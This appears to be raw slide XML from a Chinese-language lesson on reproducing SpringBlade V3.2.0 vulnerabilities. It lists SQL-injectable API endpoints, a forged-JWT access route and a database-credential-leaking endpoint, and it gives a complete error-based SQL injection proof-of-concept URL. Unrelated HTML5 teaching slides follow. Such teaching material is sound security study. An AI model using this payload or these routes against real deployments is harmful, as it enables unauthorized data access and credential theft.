            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>V3.2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Saber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>源码，后端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>源码；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前后端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>依赖库；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>部分中间件安装包以及搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>过程；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据大家的兴趣自行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搭建。</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03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:t>复现</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>收集</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如何快速获得一个开源的框架有哪些被公布的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、通过搜索引擎在搜索的框架后面增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>EXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等等关键词</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、通过开源框架的项目地址的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中，可能为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也可能是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>gitee</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174750" y="2767330"/>
            <a:ext cx="7094855" cy="3766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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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本节课主要给大家分享</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架的两类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一类：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>V3.2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入类漏洞主要存在一下接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、/api/blade-log/error/list</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/api/blade-log/usual/list</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、/api/blade-user/export-user</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、/api/blade-system/menu/list</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/api/blade-system/dict/list</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第二类：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>授权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>访问类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/api/blade-user/user-list接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第三类：泄露数据库账号密码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/api/blade-develop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>datasource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/list</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/blade-log/error/list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/api/blade-log/error/list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接口：在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务模块中，作用是查询错误日志信息表。那么可以构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报错注入。结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如下：</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只要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>version()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>版本大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8.0.X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以实现注入。那么把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>version()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>换成其他比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求方式：GET</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完整POC：http://{ip}:{port}/api/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144780" y="1909445"/>
            <a:ext cx="11339195" cy="2416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/blade-log/usual/list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>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57785" y="1214120"/>
            <a:ext cx="4550410" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/api/blade-log/usual/list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接口：也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务模块下查询通用日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接口。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先在登录之后获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>抓包拦截请求构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>右图是该接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的接入点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="网站切入点"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5991860" y="1118235"/>
            <a:ext cx="4462145" cy="5448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sym typeface="+mn-ea"/>
              </a:rPr>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23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="850497" y="1646461"/>
            <a:ext cx="10764560" cy="4166510"/>
            <a:chOff x="850497" y="1646461"/>
            <a:chExt cx="10764560" cy="4166510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="组合 23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="850497" y="1646461"/>
              <a:ext cx="10764560" cy="4166510"/>
              <a:chOff x="920209" y="1823315"/>
              <a:chExt cx="10555486" cy="4166510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="矩形: 对角圆角 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823315"/>
                <a:ext cx="10555486" cy="4166510"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 4460"/>
                  <a:gd name="adj2" fmla="val 5241"/>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360000" bIns="36000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pP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HTML</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yper</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">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t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="16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ext</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arkup </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a:t>
                </a:r>
                <a:r>
                  <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anguage</a:t>
                </a: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）：超文本标记语言。</a:t>
                </a:r>
                <a:endPara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612140" lvl="3" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="u"/>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超文本：超越了文本的限制，比普通文本更强大。除了文字信息，还可以定义图片、音频、视频等内容</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612140" lvl="3" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="u"/>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标记语言：由标签构成的语言</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9795" lvl="5" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>HTML5</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>多媒体支持。</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>原生支持音频（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>&lt;audio&gt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>）和视频（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>&lt;video&gt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>）播放 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
